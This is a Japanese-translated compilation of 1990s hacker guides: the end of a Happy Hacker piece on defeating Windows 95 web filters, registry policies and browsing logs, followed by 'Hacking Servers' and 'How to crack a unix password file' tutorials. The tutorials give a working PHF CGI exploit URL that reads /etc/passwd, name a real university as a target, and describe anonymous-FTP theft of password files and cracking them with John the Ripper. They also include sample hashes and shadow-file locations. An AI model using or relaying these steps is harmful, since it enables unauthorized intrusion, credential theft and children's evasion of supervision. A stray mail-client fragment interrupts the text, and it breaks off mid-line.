も用意してからシスアドに泣き付きに行って直してもらった方がいい。何をす るにしても、「Happy Hackerがやれと言ったからやった」なんて理由をつけな いように。 ******************************* Step 6 : Aドライブに起動ディスクを入れてみる。 これじゃちょっと分かりにくいって?もっと簡単な方法を教えろ?実はマザー ボードをいじくらなくて、同じ事を行なってくれるプログラムが存在するので ある。 CMOSでの遊び方 #2 私は皆さんに、はんだこてを持ってきて実際に行動に移る前にこのテキストを 全部読んでくれたと願っている。実はCMOSパスワード問題を簡単に解決する方 法がある。そのプログラムの名はKillCMOSと言い、http://www.koasp.com(翻 注:現在閉鎖)からダウンロードが可能である。(注:私ならLINUXやプロバイ ダのShell Accountから使えるLynxブラウザを使用して見る) では仮にアナタがネットサーフィングが好きなのだけど、自分の使用するWindows 95 の一部の機能に規制がかけられて自分のアクセスしたい場所にアクセス出来な いとしよう。これではこのまま素直に相手の思うままにするか?冗談じゃない。 実はこのような規制を回避する方法が幾つか存在する。 さて、ここから私が説明する事とは、けしてガキ達にポルノ写真を提供するよ うな主旨の内容ではない。悲しい事にネット上に存在するセンサー機能はWeb上 で行なわれている行動全てを感知する事は出来ない。だから一部の連中がする 事とは、限った連中だけにだけアクセス権を与えて、これにより子供達がWeb上 でワンダフルな事実を発見出来ないようにする。 4児の母親となって、私は世間の親が自分の子供がインターネットを通して得 る情報に対し悩んでいる事に理解出来る。しかし巷で使用されているWebセンサー プログラムは子供達の行動を把握するにはまだ完全ではない。その為子供達は コンピューターをちゃんと責任持って使えるようになり、そしてダイナマイト なHackerになるのである!おっと、、、、そうじゃない、責任感あるサイバー の住民となるのである。でもこれらプログラムを回避する方法は簡単である。 先ず最初の方法としてキーボードのCtr-Alt-Deleteを押す。これでTask List が表示されるので、その中からセンサー機能を持つプログラムを見つけて、そ れを消せばいい。 2つ目の方法としてautoexec.batを編集し、Web上での感知機能を全て消すとい う方法もある。 しかしアナタの両親(それか会社のボス)が過剰にアナタのネットサーフィン グの内容を調べようとするならどうだろう。アナタは当然自ら墓穴を掘るよう な証拠は残したくないハズ。 もしそれがNetscapeなら、先ずNetscape.iniをメモ帳がワードパットで立ち上 げる。これは多分C:\Netscape\netscape.iniにある。そして下の方にURLの歴史 が並んでいる。これを消せばいい。 だがInternet Exploreは、分解するにはちょっと難しいブラウザである。Internet Exploreのセンサー機能を回避するにはレジストリを変更する以外方法が無い。 (少なくても私が知る限り)そしてさらに!レジストリにある他のブラウザ情 報もついでに隠せる事が出来るのである! ************************* Newbie note: レジストリ!これはWindowsをCrackするには不可欠な物である。 どんな奴でもネットワークサーバーのレジストリを管理しているなら、ネット ワークをコントロール出来るのである---完全に。どんな奴でもWin 95やWin NT のレジストリを管理している奴は、コンピューターをコントロール出来るので ある---完全に。レジストリを編集するという事は、UNIXをROOTで走らせると同 じくらい意味があるのだ。 ************************* レジストリ編集方法 Step 0 : 全てのファイルをバックアップする。起動ディスクも用意する。 もしレジストリを必要以上に変更したらOSを再インストールす る事になりうる。 ****************************** ひょっとしてクビになるかも注意:もし仕事場で使用するコンピューターの レジストリを編集する場合、それがバレたらシスアドやボスに納得出来る様 な言い訳を用意しておくこと。仕事場のLANサーバーのレジストリを変えたら どれくらいヤバイ事になるか、考えてみよう。 ****************************** ****************************** ひょっとしてブタ箱送りになるかも注意:他人のコンピューターのレジストリ を変える事は法律に反する事でもある。それが他人のコンピューターならまず 最初に本人の許可を得てからにしよう。 ****************************** Step 1 : レジストリを見つける。これは簡単な事ではない。Microsoftの理論 とは、自分が知らない事はそれで良いという事なのである。つまりレ ジストリを無関係のようにしてコンピューターから隠すようにしてい る。だが我々は自分のコンピューターが壊れてゴミ箱行きになろうが 気にしないだろ?では先ず【スタート】に行って【プログラム】から 【Windows Explore】に行ってWindowsディレクトリに行ってregedit.exe というファイルを見つける。(翻注:【検索】でregedit.exeと探した 方が早い) Step 2 : regedit.exeを起動させる。それをクリックすると幾つかのフォルダが 表示される。 HKEY_CLASSES_ROOT HKEY_CURRENT_USER HKEY_LOCAL_MACHINE HKEY_USERS HKEY_CURRENT_CONFIG HKEY_DYN_DATA 我々は普段パスワードを探すことに注目している。しかし今ここで表示されている 内容はそれ以上の内容の物である。これは全ての設定を含んでいるのだ-----ディスク トップの表示、ファイルのショートカット、どのファイルにアクセス権があるか、等。 もしアナタがUNIXユーザーであれば、File PermissionやPasswordsの見方を完全に変 える必要がある。が、我々は初心者だ。だからその辺については省く。 ****************************** 悪魔のささやき:実はRegeditは起動ディスクを通してDOSから立ち上げる事も出来る。 これは状況によっては非常に役立つのである・・・・・・・・・・ ****************************** Step 3 : ではHKEYに注目しよう。最初にCURRENT_USERを開いてみる。とりあえずそれで 適当に遊んでみよう。ここでRegeditが、アナタに対してどのように新しい設定 を表示しているか理解出来ると思う。その内Microsoftがいかにアナタを管理し ているか分かってくるだろう。 Step 4 : ここでさっそくHackerらしい事をしようではないか。我々はここでレジストリを 他の場所に移動させる---そして変更するのである---全てを。最初にHKEY_CLASSES_ROOT をクリックし、それをハイライトする。そのまま上のRegeditのメニューバーに 行く。そしてそれをクリックし、Export registry Fileを選択する。そして拡張子 をregにして名前を決める。 Step 5 : そのレジストリをワードパットで開く。ここで大事なポイントとはメモ帳や他の ワードプロセッサを使用して開かないという事である。 Step 6 : MicrosoftはアナタがWindowsセキュリティーを変更することを怖がっている。 レジストリに書かれているこういった内容を探してみよう。 例: [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl\CurVer] @="htmlctl.PasswordCtl.1" [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1] @="PasswordCtl Object" [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1\CLSID] @="{EE230860-5A5F-11CF-8B11-00AA00C00903}" ここで最後の行に書かれているブラケット({}の事)の中身とはencryptされたパスワード であり、このパスワードはInternet Explorer等に装備されているネット上の監視機能のア クセスコントロールを管理している。ここではアナタがencryptされていないパスワードを 入力するとencryptされていないバージョンのファイルと比較するようになっている。 Step 7 : この時点で、どのパスワードがどのソフト上で働くかまでは分からない。私は ここで全てを削除する。当然そんな事やったら、例えばISPに接続する時のパス ワード等も消えてしまうだろう。さらにInternet ExplorerはContent Advisor configuration informationが消えているとWarningウインドウを表示する事も る。 さらに、もしこの時点でOSを消してしまったら、何故アナタのコンピューターが 病気なのか、納得出来るような理由をお父さんとお母さん両方に対して用意して おこう。だがコンピューターが動かなくなった時、起動ディスクを利用してWin 95 を再インストールする方法を学ぶのも良いアイデアだろう。 Step 8(オプション) : ネット上の行動記録を消したい?Internet Explorer ならHKEY_CURRENT_USER、HKEY_LOCAL_MACHINE、そしてHKEY_USERSを編 集しなくてはいけない。後はc:\windows\cookies\mm2048.datとc:\windows\ cookies\mm256.datのCookiesファイルも削除すること。これらもURL データーを保存するファイルなのである。 Step 9 : Regeditを元の場所に戻す。方法は先ほどの反対。(Step 4参照) Step 10 : げっ!!やばい!Internet Explorerを起動させたらなんか奇妙な音 を出し始めて、赤くてまぶしい"X"の文字が表示されて、俺が中身を イタズラしたと表示しやがった!これじゃ親に殺される!! でもこれは、コンピューターがゴミ箱行きになるよりかはましだぞ。 これは全てが消えたという訳ではない。Registryと今までのバックアップを消そ う。それらは4つのファイルから構成されている。system.dat、user.dat、そし てそれらのbackupであるsystem.da0とuser.da0である。これでアナタのOSは自殺 行為を働く。(これは本当にエキサイティングなテストだ。このアドレナリンが 最高だぜっ!!)ここでコンピューターが完全に使えなくなっても、リサイクル ビンはレジストリを削除しても動くので、ここからレジストリを取り戻して、そ の前のアナタがコンピューターを壊した状態に戻す事が出来る。でももしアナタ にガッツがあるなら、これらのファイルも全て削除してコンピューターを終了さ せてしまおう。 ここでWin 95起動ディスクを使用してコンピューターを生き返らせる。Windows 95 を再インストールする。ここでアナタのディスクトップの画面表示が変わってい たら、友達や仲間達にアナタがWin 95の内容を理解したと誇りを持って言ってや ろう。ただ彼らが、未だに起動しているInternet Explorerのセンサー機能を調 べない事を願う。 そしてもしアナタの親が、アナタがナチスドイツの爆弾製造方法を紹介している HPにアクセスしている事を知ったり、自分が親の立場で我が子がそういうHPに アクセスしている事を知った場合、我々Happy Hackerを責めないように。Microsoft セキュリティーを責めること。それか親が自分の子供に世間の善し悪しを十分に 教えなかった事を責めることだな。 じゃあ何故私はこの説明で、たんに上で言った4つのファイルを削除してWin 95 を再インストールすれば良いと言わなかったのか。それはもしアナタが本格的な Hackerに成る気が半分しか無くても、どっちにしたってWindows NTのRegistryの 編集方法を学ばなくてはならないのであるからだ。ここでは紹介した方法は、自 宅のコンピューターからで安全にその”雰囲気”を味わうだけの為のものである。 そしてここで紹介した方法から、レジストリをちょっとだけでも変更するだけでど れだけ簡単にWin 95を破壊出来るかも学べたハズ。だがアナタはこれ以上私の言う 事をそのまま実行する必要は無い。アナタは既に無慈悲なHacker連中が相手のコ ンピューターを、どう破壊するか理解いただけただろう。それだけで十分である。 事実、もしアナタの身の回りに物質的に触れる事の可能なコンピューターがあれば、 そのコンピューターを不正侵入から守る唯一の方法とは、強力なアルゴリズムを使 用したソフトでファイルをencryptするしかない。RSAのような強力なアルゴリズム を使用してファイルをencryptしない限り、世界中どんなコンピューターでも関係無 く内部のファイルにアクセスが可能なのである。 ただ我々はWin 95侵入方法の全てをここで紹介した訳ではない。しかし現状において 方法は幾つも存在する。Win 95ならネットワークに接続されている以上、中身を encryptしない限り危険なのである。 そしてネット上のセンサー機能を回避する方法も多数存在する。だが一番使える方 法とは、自分の子供がいいかげんバカな真似から卒業するか、それら危険な情報を、 違う形で今後有益な情報として活用するかのどちらかであろう。申し訳ないが技術 的な方法で子供達に世間の善し悪しを教える方法は無いのである。 ****************************** 悪魔のささやき:workstationで起動しているWindows 95の設定を変えたいかい? ではレジストリを安全な場所に移そう。注意:結果は各コンピューターによって 異なる。これを実際に行なって成功するかいなかはコンピューターによる HKEY_LOCAL_MACHINE\Network\Logon] [HKEY_LOCAL_MACHINE\Network\Logon] "MustBeValidated"=dword:00000000 "username"="ByteMe" "UserProfiles"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies] "DisablePwdCaching"=dword:00000000 "HideSharePwds"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives"=dword:00000000 "NoClose"=dword:00000000 "NoDesktop"=dword:00000000 "NoFind"=dword:00000000 "NoNetHood"=dword:00000000 "NoRun"=dword:00000000 "NoSaveSettings"=dword:00000000 "NoRun"=dword:00000000 "NoSaveSettings"=dword:00000000 "NoSetFolders"=dword:00000000 "NoSetTaskbar"=dword:00000000 "NoAddPrinter"=dword:00000000 "NoDeletePrinter"=dword:00000000 "NoPrinterTabs"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network] "NoNetSetup"=dword:00000000 "NoNetSetupIDPage"=dword:00000000 "NoNetSetupSecurityPage"=dword:00000000 "NoEntireNetwork"=dword:00000000 "NoFileSharingControl"=dword:00000000 "NoPrintSharingControl"=dword:00000000 "NoWorkgroupContents"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "NoAdminPage"=dword:00000000 "NoConfigPage"=dword:00000000 "NoDevMgrPage"=dword:00000000 "NoDispAppearancePage"=dword:00000000 "NoDispBackgroundPage"=dword:00000000 "NoDispCPL"=dword:00000000 "NoDispScrSavPage"=dword:00000000 "NoDispSettingsPage"=dword:00000000 "NoFileSysPage"=dword:00000000 "NoProfilePage"=dword:00000000 "NoPwdPage"=dword:00000000 "NoSecCPL"=dword:00000000 "NoVirtMemPage"=dword:00000000 "DisableRegistryTools"=dword:00000000 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp [END of message text] [Already at end of message] PINE 3.91 MESSAGE TEXT Folder: INBOX Message 178 of 433 END [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp] "Disabled"=dword:00000000 "NoRealMode"=dword:00000000 ****************************** ________________________________________________________ Want to see back issues of Guide to (mostly) Harmless Hacking? See http://www.feist.com/~tqdb/evis-unv.html. Want to subscribe to this list? Email majordomo@edm.net with the message "subscribe happyhacker." Want to share some kewl stuph with the Happy Hacker list? Send your messages to hh@edm.net. To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com. Please direct flames to dev/null@techbroker.com. Happy hacking! Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at the end.. ________________________________________________________ ================================= __________ _______________ _________ / /\ / ______ /\ / ____ \ / ______/ / / /\____/ / / / /\___\ \ / /\_____\/ / / / / / / / / / \ \ / /_/___ / / / / / / / / / \ \ / /\ / / / / / / / / / / /\ / _____/ / / / / / / / / / / / / / / /\____\/ / / / / / / / / / / / / / /_/___ / / / / / / / / / / / / / /\ / /_/___/ / / / /_/_______/ / / /__________/ / /______________/ / /________________/ / \__________\/ \______________\/ \________________\/ Essence Of Darkness -'Hacking Servers 101' was written by ChronicK of THE E0D- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ DiSCLAiMER: ++ ++ CHRONiCK NOR ANY PARTiES AFFiLIATED WiTH HiM TAKE ++ ++ SPONSABiLiTY, WiTH THE CONTENTS CONTAiNED iN THiS ++ ++ TEXT FILE. THiS CONTENT iS FOR EDUCATiONAL PURPOSES ++ ++ ONLY, AND WHERE NOT PERSONALLY USED BY CHRONiCK, OR ANY ++ ++ OTHER PARTiES AFFiLiATED WiTH HiM... ++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ALL MiSPELLED WORDS, PUNCUATiON, AND OTHER MiSTAKES, ++ ++ ARE CONSiDERED AS'ARTiSTiC EXPRESSiNGS'. ++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Hacking Servers: A Beginner's Guide By: Lord Dredd 「どうやってハックするの?」「WEBをハックする方法ってあるん ですか?」今日までに一日最低5回はこういった感じの質問を若い、初心者ハ ッカー達から聞かれてきた。で、実は方法はある。しかしそれらは、事実、文 章上では100以上もの方法があるのだ。私はこのテキストにおいて、若いハ ッカー達が簡単に始められるように幾つかの方法を説明するつもりだ。全ての ハッカーにおいてまず最初にWEB上のサーバーとFTPサーバーをハックす る事が最も賢明なであろう。そしてアナタがこの文章を読んでいるという事は、 こういった行為に興味を持ち、そしてはサーバーの仕組みや、ある程度のUNIX の知識を持っていると前提する。しかし私はまずこれらの知識が無い人達の為 の説明から行なうことにしよう。 パート1:UNIXの基本コマンド 大抵のDOSコマンドはUNIXやLINUXと共通する。下記のリストは shellアカウントを使う為に重要なコマンドの内の一部である。 HELP = HELP COPY = CP MOVE = MV DIR = LS DEL = RM CD = CD ****************************** 注:下記のコマンドはLinebreaker (unix-use.txt)から引用した物 である ****************************** (一部未翻訳) awk *=* ファイル内のパターンを探す bdiff *=* 2つの大きなファイルを比較する。 bfs *=* 巨大ファイルのスキャン cal *=* 日付の表示 cat *=* Documents and prints file cc *=* C compiler cd *=* directory変更 chgrp *=* fileのgroup ownershipの変更 chmod *=* fileのaccess permissionsの変更 cmp *=* 2つのファイルの比較 comm *=* 2つのファイルを比較、共通ラインを調べる cp *=* ファイルのコピー date *=* 時間の表示 fr *=* フリースペースの表示 diff *=* 2つのファイルもしくはディレクトリの違いを表示 diff3 *=* 3つの" " du *=* file system usageの表示 echo *=* Displays its argument ed *=* Text editor ex *=* Text editor f77 *=* Fortran compiler find *=* Locates the files with specified characteristics format *=* フロッピーのフォーマット grep *=* Searches for a pattern within a file help *=* ヘルプコマンド kill *=* プロセス終了 in *=* Used to link files ipr *=* ファイルをline printerにコピー is *=* ファイルの詳細表示 mail *=* 電子メール mkdir *=* ディレクトリの新規 more *=* Displays a long file so that the user can scroll mv *=* ファイルの名前変更および移動 nroff *=* Used to format text passwd *=* パスワードの変更 ps *=* Display a process's status pwd *=* 現在居るディレクトリの表示 rm *=* ファイルの移動 rmdir *=* ディレクトリの移動および削除 sleep *=* Causes a process to become inactive for a specified *=* amount of time sort *=* Sort and merge one or more files spell *=* Finds spelling errors in a file split *=* Divides a file stty *=* Displays or set terminal parameters tail *=* Displays the end of a file troff *=* Outputs formatted output to a typesetter tset *=* Sets other terminal type unmask *=* Allows the user to specify a new creation mass uucp *=* Unix-to-Unix execute vi *=* Full screen editor wc *=* Displays details in the file size who *=* Displays information on the system users write *=* Used to send a message to another user bin *=* Used to store Unix utilities lib *=* Contains libraries used by Unix tmp *=* Contains temporary files etc *=* Contains administrative programs such as passwd dev *=* Contains files which represent devices usr *=* Contains user files -NOTE: that cuncluded unix-use.txt's commands... ***** 上記のチャート(CD, COPY DEL, DiR, HELP, MOVE)は全てMICROSOFTの DOS COMMANDである。DOS commandとはMICROSOFT DOS promptで使用されるコマン ドのことである。もしこの意味が分からないのなら、一度コンピューターを再起 動し、DOSモードのなったら上記のコマンドを実際に行えばいい。そしてその下の チャートはUNiX/LiNUX commandsの表である。 システム内において誰が現時点にアクセスしているかを見るにはWHO コマンドを使う。特定のユーザーの詳細を調べるにはFINGERコマン ドを使う。これらの基本的なコマンドを使用すればアナタは自分が使用してい るシステムにおいて必要な事全てを学ぶ事が出来る。 パート2: Cracking Passwords UNIXシステムにおける全ての正規ユーザーのパスワードが保管されて いる場所は /etcディレクトリである。ファイル名はpasswdだ。この時点で、数 人の連中は「そうか、俺がやるべき事は/etc/passwdという名のファイルを取っ てきて、ハッカーになるんだな」と考えてるだろう。 もしがお前がこういう考 えを抱いているなら、それは明らかに間違いである。passwdファイルに入って いるアカウントは全て暗号化パスワードとなっている。これらのパスワードは 全て「一方的」暗号化されており、解読する方法はない。 しかしパスワードフ ァイルからパスワードを得る方法はある。私が今までで見つけたベストなパス ワードクラックソフトの名前はCracker Jackである。このプログラムは同時に 圧縮された1000文字にも及ぶ辞典を使用する。この辞典はpasswdファイル における、解読化された単語リストの単語を比較し、どれかマッチした時に教 えてくれるプログラムである。Cracker Jackは私のHPから入手可能だ。 http://www.geocities.com/SiliconValley/9185 辞典につては次のFTPサイトで入手可能である。 ftp://sable.ox.ac.uk/pub/wordlists 私が普段使用している辞典を得るには、まずFTPサイトに行き、 American directoryに行く。そしてここに入れたらdic-0294.tar.Z(dic-0294.tar.zipの事?) という名のファイルをダウンロードする。容量的にはだいたい4メガバイトだ。 このプログラムを使用するにはまずプログラム自体を解凍する必要がある。こ れはDOS専用GzipやWINDOWS専用Winzipを使用する。解凍後、およそ8MGのテ キストファイルが表示される。これをお前が持ってるパスワードクラッカーが セーブされているディレクトリに置くのがベストである。Cracker Jackの使用 法については、同封されているドキュメントを読めばいい。 パート3:難しいパート(パスワードファイルを見つける) ここまでで、私はサーバーのハッキングにおける簡単な部分を説明し てきた。ではここでもっと難しい部分に触れる。これは常識だ。もしシステム アドミニストレイター(シスアド)が全てのユーザーのパスワードを保管して いるファイルを持ってたとしたら、彼等はそれを他に上げるハズ無い。お前は システムにログインする以外で/etc/passwdファイルを取ってこなければいけな い。 これを達成させるに2つの方法がある。主に/etcディレクトリはFTPか ら制御されていない。passwdファイルを得る方法として匿名(anonymous)でF TPに接続、/etcからpasswdファイルへのアクセスが制限されているかをチェ ックする。もしこれが制限されていないなら、これをダウンロードし、Cracker Jackを起動させる。もし制限されているなら他の方法を行なう。あるシステム によっては/cgi-binディレクトリ内にPHFというファイルがある。このこれがあ るなら、お前はラッキーだと思え。PHFはWWW上においてユーザーからのファイ ルへリモートアクセスを許可する。(/etc/passwdファイルも含まれる) この方法を行なうには 、まずお前のブラウザを立ち上げて次のURLを打ち込む。 http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd xxx.xxx.xxx.の部分にお前がハックしたいサーバーを入れる。例として、もし お前がLouis大学をハックしたい(既に私はやったが)なら http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd と打つ。 www.slu.eduはもう何も手を出さないように。私は既に手を出しており、その セキュレティーの甘さを相手に報告してある。ここでヒント、www.spawn.comと www.garply.comだ。 もしこれらの方法でも無理なのであれば、自分が思うどんな方法をでも使って ファイルを得ることだ。もしお前がファイルを得てきて、それらの第二 フィールドがXや!や*なら、それはパスワードファイルがshadow化されている という事だ。 shadow化とは、ハッカーや不正アクセス者から守る為にさらに追 加されたセキュレティー法則である。残念な事に現状においてshadow化された パスワードファイルを解読する方法は無い。しかしバックアップされた、 shadow化されていないパスワードファイルは存在する。/etc/shadowみたいな 場所を探してみるのがいいだろう。 パート4:君の "新しい" Shellアカウントへのログイン OK・・・・・これがお前がCracker Jackから得た情報を使う場所だ。 まずテルネットを起動、パスワードをクラックしたサーバーへテルネットする。 例えばwww.slu.eduみたいにだ。接続されると相手はまずログインのスクリーン を表示させ、login nameとpasswordと、普通はサーバーが使っているオペレー ティング システムの詳細を表示する。(大抵UNIX, LINUX, AIX, IRIX, ULTRIX, BSD,そして場合によってDOSかVAX/VMS)ここでお前がクラックした時に得た物 をタイプし、お前がUNIXに関して知っている事で、やってみたい事を行なう。 しかしここで覚えてもらいたいのだが、ハッキングとはけしてウイルスを巻き 散らす事や他のコンピューターシステムに傷害を与える行為ではない。お前の 知識向上の為に、お前の知識を駆使する行為である。 パート5:Newbie情報 もしお前が本当のハッカーに成る気があるなら、まず初めに明確なる ハッキングの意味と、そして論理的にどうやってハッカーになるかを知らなく てはいけない。UNIX環境に対して精通になり、近所の図書館にでも通い、イン ターネット上における異なったオペレーティングシステムがどのように動くか を学ぶ事だ。それか書店にでも行き、インターネット上のセキュリティー関連 書籍等を購入することも可能だろう。大抵こられの本は、ビギナー達がいずれ 利得として使用出来るような、先人ハッカー達がどのような方法でシステム内 部に侵入するか等か説明されているのである。 *********************************************************************** ================================= -=How to crack a unix password file=- -=Lord Devious=- (1)まずPasswd Fileを入手する。 これには幾つかの方法がある。 A.)プロバイダーにTelnet 21で接続する。 B.)FTPクライアントで入手する。私はWINFTPを使用している。 これは下記のサイトでダウンロード可能だ。 http://www.geocities.com/siliconvalley/vista/9203/winftp.zip (注:窓の杜やFILEZ.COMでも入手可能) (2)サーバーへのlogin A.)Telnetの場合、下記をタイプする: User anonymous login B.) WINFTP使用の場合: 自分が接続したHOST名の欄を入力、それ以外の欄をブランクにしたまま の状態で、 Anonymous Loginを選択すれば、自動的にAnonymousというUser Idで 接続される。 この時点でシステム内に入れたハズ。(多分TMP内だろう)もし無理な ら、システムがanonymous loginsを許可していないのだ。もし本当にそうなので あれば、そのシステムAccountを入手する。方法はまずISPと連絡を取り、自分が ゲスト用トライアルバージョンのアカウントが欲しいと言う。大抵相手は素直に くれるだろう。 (3) password fileを見つる。 大抵の場合、ETCディレクトリ内でPasswd Fileを見つける事が出来る。 だいたいPasswd Fileの名前はPWD.DBやPASSWDである。見つけたらこれをダウン ロードする。 (4) SHADOW化されたパスワードをCRACKする事は容易ではないという事は、 予め分かっているだろう。しかしひょっとしてそのパスワードがSHADOWか、そう じゃないか分からないかもしれない。そこでここに例を上げてみる。 <<SHADOW化されていないPassword File>> root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh daemon:*:1:1:Mr Background:/: sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys: bin:PASSWORD HERE:3:4:Mr Binary:/bin: uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp: sso:Nologin:6:7:System Security Officer:/etc/security: news:Nologin:8:8:USENET News System:/usr/spool/netnews: sccs:PASSWORD HERE:9:10:Source Code Control:/: ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh jgordon:w4735loqb8F5I:275:15:James."Tiger" Gordon:/usr/email/users/jgordon:/bin/csh lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh <<END>> 勿論実際のファイルはもっと長いが、これで基本的なアイデアはつかめ たと思う。もしこれ以降のファイルが欲しいのあれば、下記のサイトで入手可能 である。 http://www.chez.com/davidcb/unshd.zip <<Shadow化Password Fileの例>> root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh field:*:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh operator:*:0:28:Operator PRIVILEGED Account:/opr:/opr/opser ris:*:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh daemon:*:1:1:Mr Background:/: sys:*:2:3:Mr Kernel:/usr/sys: bin:*:3:4:Mr Binary:/bin: uucp:*:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico uucpa:*:4:1:uucp adminstrative account:/usr/lib/uucp: sso:*:6:7:System Security Officer:/etc/security: news:*:8:8:USENET News System:/usr/spool/netnews: sccs:*:9:10:Source Code Control:/: ingres:*:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh rlembke:*:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh rhuston:*:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh jgordon:*:15:James."Tiger" Gordon:/usr/email/users/jgordon:/bin/csh lpeery:*:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh nsymes:*:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh <<END>> こちらのファイルも上と同じように一部分のみである。これ以降のファイルがほ しければ下記のサイトから入手可能。 http://www.chez.com/davidcb/shdod.zip (5) SHADOW化されていないPasswd Fileのクラック方法 もし入手したPasswd FileがSHADOW化されていないと分かったら、さっそ く実行に移す。まずCRACKするにあたって、クラッカープログラムを入手しなくて はならない。 John the ripperやCracker Jackなどがいいが、個人的にはJohn the ripperを勧める。これ下記のサイトでダウンロードが可能。 http://www.chez.com/davidcb/ucfjohn1.zip ランダムパスワードの辞書を作る。それかもし良い辞書が欲しいなら、 http://www.hackersclub.com/km/newbies/lesson1/lesson1.zip をダウンロードする。このファイルはPUFFS.DIC(Jhon the ripper、 Cracker Jack専用辞書)、 CJACK.FAQ(kM氏によるCracker Jack FAQ) HACKME.TXT(password fileの例)INFO.TXT(CRACKINGのレッスン説明) の4つのファイルが含まれているので勧める。 B.)Cracking Programの起動 BA.)John the ripperの場合 john -w:puffs.dic BB.) Cracker Jackの場合 jack (Enter) PROMPTがpassword fileの時: (Password Fileの名前を入力) PROMPTがwordlist fileの時: PUFFS.DIC (Or custoume file) c.) The tuffest step of all WAIT! 実際にPasswd Fileが入手出来る可能性など、お前の運次第だ。 多くのユーザーはパスワードに数字を使用している。PUFFS.DICはそれ ほど多くの数字を含んでいないので、私が制作したプログラムで6桁の 数字を作れば効果はある。下記のサイトで入手可能。 http://www.chez.com/davidcb/ldmake.zip (6) 仮にPasswd FileがSHADOW化されてても、何処で本当のPasswd File(ECRYPT化) されたPasswd Fileを入手するか 以前にも言った通り大抵のパスワードファイルはETCディレクトリにある。 しかし場合によってはPasswd FileがSHADOW化されている。下記は、SHADOW化さ れたPasswd Fileの、本当のPasswd Fileが存在する場所をそれぞれのOSによっ て振り分けたディレクトリのリストである。 Version Path Token ----------------------------------------------------------------- AIX 3 /etc/security/passwd ! or /tcb/auth/files// A/UX 3.0s /tcb/files/auth/?/* BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user/ * EP/IX /etc/shadow x HP-UX /.secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd[.dir|.pag] * SCO Unix #.2.x /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow System V Release 4.0 /etc/shadow x System V Release 4.2 /etc/security/* database Ultrix 4 /etc/auth[.dir|.pag] * UNICOS /etc/udb * (7)Passwdを入手した。じゃあ何をするの? 私の場合はまずクラックしたシステムのアドミニストレイター(シスアド) に、セキュリティー性能に問題があり、パスワードがクラック可能だという事を説 明する。あと犯罪行為は犯すな。これだけは覚えとくように。人々はお前に対して 助けを差し伸べた時に、さらに好感触を抱く。破壊する事ではないのだ。 Have fun! Lord Devious ================================= Hacking Webpages The Ultimate Guide By Virtual Circuit and Psychotic Psychoticが実に便利なUNIX TEXTファイルをサイバースペースの為に執筆して くれたが、我々が36ページにも及ぶUnix Bibleをリリースした後から送られ て来たメールを見て、全てのユーザーUNIXを使用しているとは限らないと分か った。その為我々はHACKINGを違う面から説明する事に決めた。我々Virtual CircuitとPsychoticは、今回のテキストである"Hacking Webpages With a few Other Techniques"公開を光栄に思う。我々はここで幾つかのWEB Pageに対する ハッキング方法と、さらにROOTになる方法を説明する。そしてさらに本物の HACKER達に質問をし、それを公開する予定である。 FTPからPssword Fileを入手する方法 --------------------------------- ではまずSuper Userとしてアクセスする初歩的な方法として、匿名FTPアクセス (Anonymous FTP)でWEB Pageにアクセスする方法がある。まず最初にPssword File に関する幾つかの知識を知らなくてはいけない。 Getting the Password File Through FTP ------------------------------------- root:User:d7Bdg:1n2HG2:1127:20:Superuser 